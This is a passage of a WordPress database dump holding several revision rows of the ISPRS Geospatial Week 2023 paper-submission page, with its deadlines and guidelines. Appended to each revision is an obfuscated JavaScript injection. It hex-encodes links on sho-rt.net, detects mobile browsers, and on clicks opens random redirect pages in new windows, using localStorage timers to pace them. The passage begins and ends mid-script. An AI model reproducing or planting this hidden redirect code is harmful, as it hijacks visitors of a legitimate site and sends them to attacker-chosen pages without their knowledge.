)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-02-05 08:54:47','2023-02-05 08:54:47','',2659,'https://gsw2023.com/?p=3785',0,'revision','',0),
(3786,1,'2023-02-05 09:02:36','2023-02-05 09:02:36','<p>[vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Submit Abstracts/Papers</strong></span></p>\n<p>&nbsp;</p>\n<p>The ISPRS Geospatial Week 2023 (GSW’2023) has been opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2023\"> ConfToool website of the Geospatial Week</a>, authors can submit either a full paper or an extended abstract to one of the 26 Workshops available in GSW’2023</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n</div>\n<div class=\"three_quarter first\">\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><strong>Important Dates:</strong></p>\n<ol>\n<li><strong> Annals (Fully Reviewed Papers):</strong></li>\n</ol>\n<ul>\n<li>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 1, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><strong> Archives (Abstract Reviewed Papers):</strong></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><strong>Registration deadlines</strong></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p>Useful links:</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>Make a link to our GSW2023 ConfTool</p>\n<p><a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\"><strong>Guidelines for Authors</strong></a></p>\n<p><a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\"><strong>Reviewing process for ISPRS Events</strong></a></p>\n<p>&nbsp;</p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-02-05 09:02:36','2023-02-05 09:02:36','',2659,'https://gsw2023.com/?p=3786',0,'revision','',0),
(3787,1,'2023-02-05 09:05:10','2023-02-05 09:05:10','<p>[vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Submit Abstracts/Papers</strong></span></p>\n<p>&nbsp;</p>\n<p>The ISPRS Geospatial Week 2023 (GSW’2023) has been opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2023\"> ConfToool website of the Geospatial Week</a>, authors can submit either a full paper or an extended abstract to one of the 26 Workshops available in GSW’2023</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n</div>\n<div class=\"three_quarter first\">\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><strong>Important Dates:</strong></p>\n<ol>\n<li><strong> Annals (Fully Reviewed Papers):</strong></li>\n</ol>\n<ul>\n<li>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 1, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><strong> Archives (Abstract Reviewed Papers):</strong></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><strong>Registration deadlines</strong></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p>Useful links:</p>\n<p><a href=\"https://www.conftool.com/gsw2023\">ConfToool website of the Geospatial Week2023</a></p>\n<p><a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\"><strong>Guidelines for Authors</strong></a></p>\n<p><a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\"><strong>Reviewing process for ISPRS Events</strong></a></p>\n<p>&nbsp;</p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 